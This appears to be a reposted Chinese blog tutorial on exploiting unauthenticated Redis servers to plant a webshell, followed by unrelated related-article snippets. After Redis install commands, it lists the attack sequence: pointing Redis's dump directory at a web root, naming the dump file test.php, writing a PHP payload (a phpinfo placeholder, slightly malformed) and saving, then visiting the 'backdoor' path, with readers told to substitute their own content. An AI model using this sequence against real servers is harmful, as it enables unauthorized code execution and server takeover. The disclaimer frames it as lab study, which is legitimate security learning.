数据库服务类--Redis--未授权访问终端Getshell

server/2024/9/23 9:01:28/

免责声明:本文仅做技术交流与学习.

目录

前提条件:

redis%E6%9C%8D%E5%8A%A1%3A-toc" style="margin-left:0px;">windows上开启redis服务:

redis%E6%9C%8D%E5%8A%A1%3A-toc" style="margin-left:0px;">Linux上创建&开启redis服务:

操作:

redis-toc" style="margin-left:40px;">1-连接靶机redis

2-写入webshell

3-访问后门


redis--->webshell

Redis未授权访问漏洞复现与利用 - 知乎 (zhihu.com)

前提条件:

端口开放(6379)

目录结构清晰

redis%E6%9C%8D%E5%8A%A1%3A">windows上开启redis服务:

windows:
redis-server.exe redis.windows.conf
redis-cli.exe -h 127.0.0.1 -p 6379

redis%E6%9C%8D%E5%8A%A1%3A">Linux上创建&开启redis服务:

 
1、下载
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
​
2、解压编译
tar xzvf redis-2.8.17.tar.gz  #解压安装包
cd redis-2.8.17  # 进入redis目录
make #编译
​
3、配置及启动
cd src/ #进入src目录 
cp redis-server /usr/bin/ 
cp redis-cli /usr/bin/      #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd ..   # 返回上一级目录
cp redis.conf /etc/     #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf  # 使用/etc/目录下的redis.conf文件中的配置启动redis服务

操作:

redis">1-连接靶机redis

2-写入webshell

config set dir /www/wwwroot/IP
config  set dbfilename test.php
set test "<?phpphpinfo();?>"
bgsave
save

 

目录,文件名自己改

写入内容自己改...

3-访问后门路径

--上线...



http://www.ppmy.cn/server/17175.html

相关文章

Lock-It for Mac(应用程序加密工具)

OSXBytes Lock-It for Mac是一款功能强大的应用程序加密工具&#xff0c;专为Mac用户设计。该软件具有多种功能&#xff0c;旨在保护用户的隐私和数据安全。 Lock-It for Mac v1.3.0激活版下载 首先&#xff0c;Lock-It for Mac能够完全隐藏应用程序&#xff0c;使其不易被他人…

SQLite FTS5 扩展(三十)

返回&#xff1a;SQLite—系列文章目录 上一篇:SQLite的知名用户(二十九) 下一篇:SQLite 的命令行 Shell(三十一&#xff09; 1. FTS5概述 FTS5 是一个 SQLite 虚拟表模块&#xff0c;它为数据库应用程序提供全文搜索功能。在最基本的形式中&#xff0c; 全文搜索引擎允许…

nvm管理多个node版本,快速来回切换node版本

前言 文章基于 windows环境 使用nvm安装多版本nodejs。 最近公司有的项目比较老需要降低node版本才能运行&#xff0c;由于来回进行卸载不同版本的node比较麻烦&#xff1b;所以需要使用node工程多版本管理&#xff0c;后面自己就简单捯饬了一下nvm来管理node&#xff0c;顺便…

邦芒面试:巧妙应对“你对自己五年内的规划是什么?

面试中&#xff0c;面试官常常会抛出一个看似简单却暗藏玄机的问题&#xff1a;“你对自己五年内的规划是什么&#xff1f;”这个问题旨在考察应聘者的职业规划、目标设定以及对公司的兴趣和契合度。那么&#xff0c;如何巧妙回答这一棘手问题呢&#xff1f;以下是一些专家的建…

STM32读写备份寄存器BKP

今天学习的读写STM32的备份寄存器BKP的步骤&#xff0c;这节知识是比较简单的&#xff0c;一共也就两大部&#xff1a; 这个BKP寄存器的意思就是在芯片的VB引脚上接个电池&#xff0c;就能保存其寄存器中的数据掉电不丢失。先来看看电池的接法&#xff1a; 好&#xff0c;下面…

可使用的 ESRGAN 超分模型

Kaggle中使用 !pip install githttps://github.com/sberbank-ai/Real-ESRGAN.gitimport os from huggingface_hub import hf_hub_download import torch os.environ["HF_ENDPOINT"] "https://hf-mirror.com" model_path hf_hub_download(repo_id"S…

Android音视频开发-AudioTrack

Android音视频开发-AudioTrack 本篇文章我们主要介绍下AudioTrack. 1: 简介 AudioTrack是Android平台上的一个类&#xff0c;用于播放音频数据. 它允许PCM音频缓冲区流式传输到音频接收器进行播放. 创建AudioTrack对象&#xff1a;可以通过构造函数创建AudioTrack对象&…

java后端项目:视积分抽奖平台

一、项目背景: 本次抽奖系统实现是在视频中内置一个线上活动抽奖系统,奖品是在一个时间段区间内均匀发布,用户可以在这个时间段内参与抽奖。 二、项目架构 活动抽奖平台采用微服务架构来完成,在功能上实现拆分为用户、网关、以及抽奖微服务,其中用户、网关是后台项目通…